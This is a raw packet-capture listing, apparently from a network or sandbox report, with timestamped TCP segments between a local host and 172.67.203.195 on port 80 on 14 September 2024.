Sep 14, 2024 18:31:11.868628025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868643999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868657112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868657112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868668079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868679047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868696928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868695974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868710041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868720055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868721008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868733883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868743896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868753910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868763924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868766069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868779898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868791103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868802071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868808985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868820906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868824005 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868834019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868844032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868844032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868884087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868895054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868905067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868906021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868916988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868927956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868949890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868958950 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868962049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868973970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868983030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868987083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868999958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.869029045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.869029045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.869123936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.869134903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.869146109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.869154930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.869177103 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.869206905 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.877613068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.877624989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.877635956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.877703905 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.877718925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.877729893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.877741098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.877751112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.877752066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.877763987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.877799988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.877830982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.906682968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.906694889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.906703949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.906713009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.906723022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.906730890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.906740904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.906753063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.907016993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.907016993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.950117111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950134993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950145006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950154066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950164080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950171947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950184107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950284004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950294971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950304985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950306892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.950308084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.950314045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950325966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950367928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950380087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.950386047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.950386047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.950386047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.950440884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.953069925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953079939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953090906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953146935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953157902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953167915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953183889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953183889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.953197002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953217030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.953255892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953265905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953277111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953283072 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.953324080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.953397989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953408003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953418016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953428030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953438044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953448057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953454971 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.953491926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.953491926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.953531981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953541994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953552008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953560114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.953584909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.953619003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.954772949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.954823017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.954833031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.954840899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.954878092 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.954978943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.954989910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.954996109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955003977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955018997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955034971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955044985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955056906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955056906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955066919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955079079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955113888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955147028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955157995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955173969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955183983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955193043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955209017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955219984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955219984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955230951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955240011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955241919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955260992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955264091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955271959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955281973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955293894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955301046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955322981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955343008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955352068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955363035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955374002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955391884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955403090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955416918 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955455065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955465078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955472946 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955477953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955491066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955502987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955514908 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955547094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955564022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955564976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955579042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955589056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955600023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955610991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955646992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955677032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955699921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955710888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955723047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955734015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955744028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955754042 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955755949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955794096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955823898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955873013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955884933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955894947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955905914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955916882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955925941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955933094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955940962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955954075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955965042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.955975056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.955976009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.956006050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.956006050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.956020117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.956031084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.956048012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.956058979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.956068993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.956079006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.956080914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.956094980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.956104994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.956116915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.956144094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.964539051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.964560032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.964571953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.964581013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.964591980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.964613914 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.964628935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.964639902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.964647055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.964652061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.964688063 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.993740082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.993748903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.993753910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.993762970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.993767977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.993777037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.993787050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.993797064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.993863106 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.994003057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.036956072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037045956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037056923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.037112951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037130117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037141085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037195921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037205935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037214994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037317038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037326097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037334919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037344933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037354946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037365913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037378073 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.037379026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.037379026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.037379026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.037471056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037480116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.037481070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.037525892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.039997101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040014029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040021896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040049076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040055990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040059090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040086985 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040117979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040124893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040136099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040146112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040205002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040224075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040235043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040244102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040255070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040271997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040306091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040355921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040365934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040374994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040385962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040395975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040406942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040412903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040417910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040430069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040430069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040452003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040482998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040488958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040505886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040514946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.040555000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.040586948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.041759014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041826963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041836977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041846991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041856050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041876078 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.041894913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041903973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041914940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041934967 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.041935921 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.041975975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041985989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041996002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.041996956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042012930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042025089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042028904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042036057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042083025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042118073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042129040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042138100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042152882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042171955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042224884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042300940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042311907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042321920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042330980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042340040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042373896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042383909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042392969 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042393923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042411089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042422056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042431116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042431116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042442083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042452097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042453051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042475939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042505980 CEST	49738	80	192.168.2.4	172.67.203.195
